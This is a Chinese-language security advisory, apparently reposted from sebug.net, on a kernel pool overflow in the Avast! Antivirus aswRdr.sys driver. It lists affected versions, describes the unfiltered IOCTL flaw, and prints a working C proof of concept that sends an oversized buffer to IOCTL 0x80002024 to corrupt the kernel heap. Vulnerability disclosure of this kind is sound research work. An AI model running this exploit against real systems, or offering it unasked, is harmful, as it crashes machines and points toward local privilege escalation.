Avast! Antivirus 'aswRsr.sys'驱动本地特权提升漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-11-19
Avast! Antivirus 影响版本:
Avast! Antivirus Professional Edition 4.8.1356Avast! Antivirus Professional Edition 4.8.1351Avast! Antivirus Professional Edition 4.8.1335Avast! Antivirus Professional Edition 4.8.1169Avast! Antivirus Professional Edition 4.7.1098Avast! Antivirus Professional Edition 4.7.1043Avast! Antivirus Professional Edition 4.7.844Avast! Antivirus Professional Edition 4.7.827Avast! Antivirus Professional Edition 4.6.691Avast! Antivirus Professional Edition 4.6.665Avast! Antivirus Professional Edition 4.6.652Avast! Antivirus Professional Edition 4.6.603Avast! Antivirus Professional Edition 4.6Avast! Antivirus Professional Edition 4.0Avast! Antivirus Home Edition 4.8.1356Avast! Antivirus Home Edition 4.8.1351Avast! Antivirus Home Edition 4.8.1335Avast! Antivirus Home Edition 4.8.1169Avast! Antivirus Home Edition 4.7.1098Avast! Antivirus Home Edition 4.7.1043Avast! Antivirus Home Edition 4.7.869Avast! Antivirus Home Edition 4.7.844Avast! Antivirus Home Edition 4.7.827Avast! Antivirus Home Edition 4.6.691Avast! Antivirus Home Edition 4.6.691Avast! Antivirus Home Edition 4.6.665Avast! Antivirus Home Edition 4.6.655Avast! Antivirus Home Edition 4.6.652Avast! Antivirus Home Edition 4.6Avast! Antivirus Home Edition 4.0
漏洞描述:
Bugraq ID: 37031Avast! Antivirus Professional是一款流行的反病毒应用程序。Avast's aswRdr.sys没有过滤用户提供的输入IOCTL,这可导致内核触发堆溢出,使系统触发蓝屏,也可能造成特权提升。
<*参考
http://www.securityfocus.com/archive/1/507891
*>测试方法:[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!
+---------------------------------------------------------------------------+/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption** Author(s): Giuseppe 'Evilcry' Bonfa'* AbdulAziz Hariri* E-Mail: evilcry _AT_ gmail _DOT_ com* Website: http://evilcry.netsons.org* http://evilcodecave.blogspot.com* http://evilcodecave.wordpress.com* http://evilfingers.com** Disclosure Timeline: As specified in the Advisory.*/#define WIN32_LEAN_AND_MEAN#include#includeBOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab{WCHAR DeviceName[MAX_PATH];HANDLE hDevice;if ((GetVersion() & 0xFF) >= 5){wcscpy(DeviceName, L"////.//Global//");}else{wcscpy(DeviceName, L"////.//");}wcscat(DeviceName, DriverName);printf("Opening.. %S/n", DeviceName);hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0,NULL, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, NULL);if (hDevice == INVALID_HANDLE_VALUE){printf("CreateFile() ERROR %d/n", GetLastError());return FALSE;}*lphDevice = hDevice;return TRUE;}int main(){HANDLE hDev = NULL;DWORD Junk;if(!OpenDevice(L"aswRDR",&hDev)){printf("Unable to access aswMon");return(0);}char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE |MEM_COMMIT, PAGE_EXECUTE_READWRITE);if (Buff){memset(Buff, 'A', 0x156);DeviceIoControl(hDev,0x80002024,Buff,0x156,Buff,0x156,&Junk,(LPOVERLAPPED)NULL);printf("DeviceIoControl Executed../n");}else{printf("VirtualAlloc() ERROR %d/n", GetLastError());}return(0);} 
安全建议:
目前没有详细解决方案提供:http://avast.com/

图片内容